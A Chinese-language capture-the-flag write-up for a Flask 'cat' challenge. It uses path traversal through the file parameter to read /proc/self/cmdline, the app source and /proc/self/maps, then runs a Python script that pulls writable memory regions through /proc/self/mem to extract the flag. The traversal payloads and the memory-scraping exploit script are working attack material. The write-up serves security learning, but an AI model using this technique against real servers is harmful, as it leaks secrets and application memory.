该题考察文件包含漏洞
正文
看到file参数,考虑文件读取
读取当前进程的命令行参数
?file=../../../../proc/self/cmdline
读取app.py:
b'import os\nimport uuid\nfrom flask import Flask, request, session, render_template, Markup\nfrom cat import cat\n\nflag = ""\napp = Flask(\n __name__,\n static_url_path=\'/\', \n static_folder=\'static\' \n)\napp.config[\'SECRET_KEY\'] = str(uuid.uuid4()).replace("-", "") + "*abcdefgh"\nif os.path.isfile("/flag"):\n flag = cat("/flag")\n os.remove("/flag")\n\n@app.route(\'/\', methods=[\'GET\'])\ndef index():\n detailtxt = os.listdir(\'./details/\')\n cats_list = []\n for i in detailtxt:\n cats_list.append(i[:i.index(\'.\')])\n \n return render_template("index.html", cats_list=cats_list, cat=cat)\n\n\n\n@app.route(\'/info\', methods=["GET", \'POST\'])\ndef info():\n filename = "./details/" + request.args.get(\'file\', "")\n start = request.args.get(\'start\', "0")\n end = request.args.get(\'end\', "0")\n name = request.args.get(\'file\', "")[:request.args.get(\'file\', "").index(\'.\')]\n \n return render_template("detail.html", catname=name, info=cat(filename, start, end))\n \n\n\n@app.route(\'/admin\', methods=["GET"])\ndef admin_can_list_root():\n if session.get(\'admin\') == 1:\n return flag\n else:\n session[\'admin\'] = 0\n return "NoNoNo"\n\n\n\nif __name__ == \'__main__\':\n app.run(host=\'0.0.0.0\', debug=False, port=5637)'
格式化:
import os import uuid from flask import Flask, request, session, render_template, Markup from cat import cat # 初始化变量 flag = "" app = Flask( __name__, static_url_path='/', static_folder='static' ) # 设置 Flask 的密钥 app.config['SECRET_KEY'] = str(uuid.uuid4()).replace("-", "") + "*abcdefgh" # 检查是否存在标志文件,并读取标志内容 if os.path.isfile("/flag"): flag = cat("/flag") os.remove("/flag") # 主页路由 @app.route('/', methods=['GET']) def index(): # 获取 details 文件夹下的文件名列表 detailtxt = os.listdir('./details/') cats_list = [] for i in detailtxt: # 提取文件名中的猫名并添加到列表中 cats_list.append(i[:i.index('.')]) # 渲染主页模板,传递猫名列表和 cat 函数给模板 return render_template("index.html", cats_list=cats_list, cat=cat) # 详情页路由 @app.route('/info', methods=["GET", 'POST']) def info(): # 获取请求参数 filename = "./details/" + request.args.get('file', "") start = request.args.get('start', "0") end = request.args.get('end', "0") name = request.args.get('file', "")[:request.args.get('file', "").index('.')] # 渲染详情页模板,传递猫名、详情信息给模板 return render_template("detail.html", catname=name, info=cat(filename, start, end)) # 管理员权限路由 @app.route('/admin', methods=["GET"]) def admin_can_list_root(): # 检查是否具有管理员权限 if session.get('admin') == 1: return flag else: session['admin'] = 0 return "NoNoNo" # 启动 Flask 应用 if __name__ == '__main__': app.run(host='0.0.0.0', debug=False, port=5637)
关键在于:
if session.get('admin') == 1: return flag
也就是说当session为admin时,即可得到flag
所以我们需要伪造session为admin
而session伪造的必要条件是获取SECRET_KEY读取
读取/proc/self/maps获得当前应用运行的内存映射信息:
读取cat.py
格式化:
import os, sys, getopt # 定义一个函数,用于读取指定文件的部分内容 def cat(filename, start=0, end=0) -> bytes: data = b'' try: start = int(start) end = int(end) except: start = 0 end = 0 # 检查文件是否存在并可读 if filename != "" and os.access(filename, os.R_OK): f = open(filename, "rb") if start >= 0: f.seek(start) if end >= start and end != 0: data = f.read(end - start) else: data = f.read() f.close() else: data = ("File `%s` not exist or cannot be read" % filename).encode() return data if __name__ == '__main__': # 解析命令行参数 opts, args = getopt.getopt(sys.argv[1:], '-h-f:-s:-e:', ['help', 'file=', 'start=', 'end=']) fileName = "" start = 0 end = 0 for opt_name, opt_value in opts: if opt_name == '-h' or opt_name == '--help': # 打印帮助信息 print("[*] Help") print("-f --file File name") print("-s --start Start position") print("-e --end End position") print("[*] Example of reading /etc/passwd") print("python3 cat.py -f /etc/passwd") print("python3 cat.py --file /etc/passwd") print("python3 cat.py -f /etc/passwd -s 1") print("python3 cat.py -f /etc/passwd -e 5") print("python3 cat.py -f /etc/passwd -s 1 -e 5") exit() elif opt_name == '-f' or opt_name == '--file': # 获取文件名参数 fileName = opt_value elif opt_name == '-s' or opt_name == '--start': # 获取起始位置参数 start = opt_value elif opt_name == '-e' or opt_name == '--end': # 获取结束位置参数 end = opt_value if fileName != "": # 调用 cat 函数并打印结果 print(cat(fileName, start, end)) else: print("No file to read")
其中
if start >= 0: f.seek(start) if end >= start and end != 0: data = f.read(end-start)
用于读取start到end地址间的数据
我们已经读取了/proc/self/maps获得了应用运行的内存映射信息,接下来的思路就是:读取/proc/self/mem获得当前内存的详细信息,由于在app.py的info()方法从HTTP请求中接收了start和end参数,即可传参,从而读取任意文件中任意两个地址之间的数据,最后使用正则表达式匹配字符串\w+{\w+}直接获取flag
脚本如下:
import requests import re baseUrl = "http://61.147.171.105:64383/info?file=../../../../.." if __name__ == "__main__": url = baseUrl + "/proc/self/maps" # 发送 HTTP 请求并获取响应文本,然后按换行符进行分割 memInfoList = requests.get(url).text.split("\\n") mem = "" for i in memInfoList: # 使用正则表达式匹配内存地址信息 memAddress = re.match(r"([a-z0-9]+)-([a-z0-9]+) rw", i) if memAddress: # 将匹配到的内存地址转换为十六进制数 start = int(memAddress.group(1), 16) end = int(memAddress.group(2), 16) # 构造新的 URL,用于获取特定内存片段的内容 infoUrl = baseUrl + "/proc/self/mem&start=" + str(start) + "&end=" + str(end) # 发送 HTTP 请求并获取响应文本 mem = requests.get(infoUrl).text # 如果响应文本中包含形如 "{xxx}" 的字符串,则打印出来 if re.findall(r"{[\w]+}", mem): print(re.findall(r"\w+{\w+}", mem))
结果如下:
得到flag
catctf{Catch_the_c4t_HaHa}
